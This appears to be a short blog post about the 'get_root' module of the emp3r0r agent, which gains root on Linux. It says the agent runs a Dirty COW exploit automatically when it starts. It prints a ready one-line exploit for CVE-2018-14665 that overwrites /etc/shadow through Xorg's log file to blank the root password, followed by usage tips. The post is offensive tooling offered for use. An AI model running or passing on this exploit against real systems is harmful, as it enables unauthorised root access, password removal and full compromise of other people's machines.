happy Chinese new year!
the coronavirus outbreak in Wuhan keeps me from going outside, actually i have cancelled all travel plans in this holiday. what do i do at home then?
get_root
this module can help you get root via:
- kernel exploits
- userland LPE exploits, such as exim, sudo
- previously-implemented backdoors
demo
exploits
dirtycow
dirtycow is no doubt the most famous linux LPE exploit so far, according to Wikipedia, affected linux versions including:
| Earliest kernel version fixed | Linux distribution that uses this |
|---|---|
| 3.2.0-113.155 | Ubuntu 12.04 LTS |
| 3.13.0-100.147 | Ubuntu 14.04 LTS (Linux Mint 17.1) |
| 3.16.36-1+deb8u2 | Debian 8 |
| 4.4.0-45.66 | Ubuntu 16.04 LTS |
| 4.8.0-26.28 | Ubuntu 16.10 |
| 3.10.0-327.36.3 | RHEL 7, CentOS 7 |
| 2.6.32-642.6.2 | RHEL 6, CentOS 6 |
| 2.6.18-416 | RHEL 5, CentOS 5 |
| 3.0.101-84.1 | SLES 11 SP4 |
| 3.12.60-52.57.1 | SLES 12 GA LTSS |
| 3.12.62-60.64.8.2 | SLES 12 SP1 |
its really a long list, you will love this exploit
i made a version checker with this table, and implemented a golang version of dirtycow exploit in emp3r0r agent
the agent tries to exploit dirtycow upon start when applicable
xorg (CVE-2018-14665)
xorg-server from 1.19 to 1.20.1 are vulnerable, the exploit is pretty simple:
cd /etc;Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
serveral tips:
- the
logfilepath has to be relative, thuscdis required fpmeans font path, this piece of value will appear in the resultinglogfile, as a single line- you might want to
kill $!after thelogfileis overwritten, otherwise you lose your current TTY to operate on /etc/shadowgets overwritten withlogfile, with one valid lineroot::16431:0:99999:7:::, which clears root passwordsudoesnt ask for password if theres no password, usesu -c <command>to execute arbitrary command as root
Comments
comments powered by Disqus